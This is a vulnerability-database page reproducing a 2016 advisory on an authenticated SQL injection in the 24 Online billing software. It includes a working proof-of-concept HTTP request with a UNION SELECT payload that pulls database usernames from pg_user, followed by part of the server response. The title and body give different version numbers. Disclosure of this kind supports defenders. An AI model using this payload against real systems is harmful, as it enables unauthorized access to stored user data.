Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

24 Online 8.3.7 Build 9.0 SQL Injection

🗓️ 03 Jul 2016 00:00:00Reported by rahullrazType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 34 Views

24 Online 8.3.7 Build 9.0 SQL Injection vulnerability on invoiceid paramete

Code
`Software name: 24 online  
Version: 8.3.6 build 9.0  
Vendor website: http://24onlinebilling.com  
  
Potentially others versions older than this are vulnerable too.  
  
Vulnerability type: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')  
  
The invoiceid GET parameter on <base url>/24online/webpages/myaccount/usersessionsummary.jsp in not filtered properly and leads to SQL Injection  
  
Authentication Required: Yes   
  
A non-privileged authenticated user can inject SQL commands on the <base-url>/24online/webpages/myaccount/usersessionsummary.jsp?invoiceid=<numeric-id> &fromdt=dd/mm/yyyy hh:mm:ss&todt= dd/mm/yyyy hh:mm:ss  
  
There is complete informational disclosure over the stored database.  
  
-----------------------------------  
GET /24online/webpages/myaccount/usersessionsummary.jsp?invoiceid=93043+UNION+ALL+SELECT+null,null,null,null,usename,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pg_user--+-&fromdt=06/05/2016%2019:37:44&todt=03/07/2016%2015:21:16 HTTP/1.1  
Host: 10.100.0.1  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cookie: JSESSIONID=5464B4DD2B003E1E73E34FF773CA7232; myaccountmenu_id=menu_5  
Connection: keep-alive  
  
HTTP/1.1 200 OK  
Date: Sun, 03 Jul 2016 09:59:41 GMT  
Server: Apache  
Keep-Alive: timeout=15, max=100  
Connection: Keep-Alive  
Transfer-Encoding: chunked  
Content-Type: text/html;charset=ISO-8859-1  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Jul 2016 00:00Current
0.1Low risk
Vulners AI Score0.1
24 onlinesql injectionvulnerabilityauthentication requiredinformation disclosurecwe-89user sessions
34